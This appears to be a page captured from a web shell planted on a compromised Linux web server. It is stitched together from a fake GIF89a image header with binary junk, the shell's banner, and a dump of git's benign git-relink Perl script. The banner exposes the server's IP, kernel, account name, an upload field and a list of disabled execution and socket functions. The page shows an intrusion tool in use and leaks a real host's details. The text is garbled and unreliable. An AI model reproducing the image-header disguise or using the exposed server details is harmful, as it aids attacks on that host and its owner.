GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ýNETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýým&ýýE8ýSýkGýAýpxýaýýýR2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|shýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPýýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbxýl5}ýpýýýýý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5!_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýýýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp%AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ýýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`Aý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý
Server IP : 217.18.85.50 / Your IP : 3.145.88.111 Web Server : LiteSpeed System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64 User : ferhatgenc ( ) PHP Version : 7.2.34 Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /usr/libexec/git-core/ |
Upload File : |
#!/usr/bin/perl use lib (split(/:/, $ENV{GITPERLLIB} || "/usr/share/perl5")); # Copyright 2005, Ryan Anderson <ryan@michonline.com> # Distribution permitted under the GPL v2, as distributed # by the Free Software Foundation. # Later versions of the GPL at the discretion of Linus Torvalds # # Scan two git object-trees, and hardlink any common objects between them. use 5.008; use strict; use warnings; use Getopt::Long; sub get_canonical_form($); sub do_scan_directory($$$); sub compare_two_files($$); sub usage(); sub link_two_files($$); # stats my $total_linked = 0; my $total_already = 0; my ($linked,$already); my $fail_on_different_sizes = 0; my $help = 0; GetOptions("safe" => \$fail_on_different_sizes, "help" => \$help); usage() if $help; my (@dirs) = @ARGV; usage() if (!defined $dirs[0] || !defined $dirs[1]); $_ = get_canonical_form($_) foreach (@dirs); my $master_dir = pop @dirs; opendir(D,$master_dir . "objects/") or die "Failed to open $master_dir/objects/ : $!"; my @hashdirs = grep { ($_ eq 'pack') || /^[0-9a-f]{2}$/ } readdir(D); foreach my $repo (@dirs) { $linked = 0; $already = 0; printf("Searching '%s' and '%s' for common objects and hardlinking them...\n", $master_dir,$repo); foreach my $hashdir (@hashdirs) { do_scan_directory($master_dir, $hashdir, $repo); } printf("Linked %d files, %d were already linked.\n",$linked, $already); $total_linked += $linked; $total_already += $already; } printf("Totals: Linked %d files, %d were already linked.\n", $total_linked, $total_already); sub do_scan_directory($$$) { my ($srcdir, $subdir, $dstdir) = @_; my $sfulldir = sprintf("%sobjects/%s/",$srcdir,$subdir); my $dfulldir = sprintf("%sobjects/%s/",$dstdir,$subdir); opendir(S,$sfulldir) or die "Failed to opendir $sfulldir: $!"; foreach my $file (grep(!/\.{1,2}$/, readdir(S))) { my $sfilename = $sfulldir . $file; my $dfilename = $dfulldir . $file; compare_two_files($sfilename,$dfilename); } closedir(S); } sub compare_two_files($$) { my ($sfilename, $dfilename) = @_; # Perl's stat returns relevant information as follows: # 0 = dev number # 1 = inode number # 7 = size my @sstatinfo = stat($sfilename); my @dstatinfo = stat($dfilename); if (@sstatinfo == 0 && @dstatinfo == 0) { die sprintf("Stat of both %s and %s failed: %s\n",$sfilename, $dfilename, $!); } elsif (@dstatinfo == 0) { return; } if ( ($sstatinfo[0] == $dstatinfo[0]) && ($sstatinfo[1] != $dstatinfo[1])) { if ($sstatinfo[7] == $dstatinfo[7]) { link_two_files($sfilename, $dfilename); } else { my $err = sprintf("ERROR: File sizes are not the same, cannot relink %s to %s.\n", $sfilename, $dfilename); if ($fail_on_different_sizes) { die $err; } else { warn $err; } } } elsif ( ($sstatinfo[0] == $dstatinfo[0]) && ($sstatinfo[1] == $dstatinfo[1])) { $already++; } } sub get_canonical_form($) { my $dir = shift; my $original = $dir; die "$dir is not a directory." unless -d $dir; $dir .= "/" unless $dir =~ m#/$#; $dir .= ".git/" unless $dir =~ m#\.git/$#; die "$original does not have a .git/ subdirectory.\n" unless -d $dir; return $dir; } sub link_two_files($$) { my ($sfilename, $dfilename) = @_; my $tmpdname = sprintf("%s.old",$dfilename); rename($dfilename,$tmpdname) or die sprintf("Failure renaming %s to %s: %s", $dfilename, $tmpdname, $!); if (! link($sfilename,$dfilename)) { my $failtxt = ""; unless (rename($tmpdname,$dfilename)) { $failtxt = sprintf( "Git Repository containing %s is probably corrupted, " . "please copy '%s' to '%s' to fix.\n", $tmpdname, $dfilename); } die sprintf("Failed to link %s to %s: %s\n%s" . $sfilename, $dfilename, $!, $dfilename, $failtxt); } unlink($tmpdname) or die sprintf("Unlink of %s failed: %s\n", $dfilename, $!); $linked++; } sub usage() { print("usage: git relink [--safe] <dir>... <master_dir> \n"); print("All directories should contain a .git/objects/ subdirectory.\n"); print("Options\n"); print("\t--safe\t" . "Stops if two objects with the same hash exist but " . "have different sizes. Default is to warn and continue.\n"); exit(1); }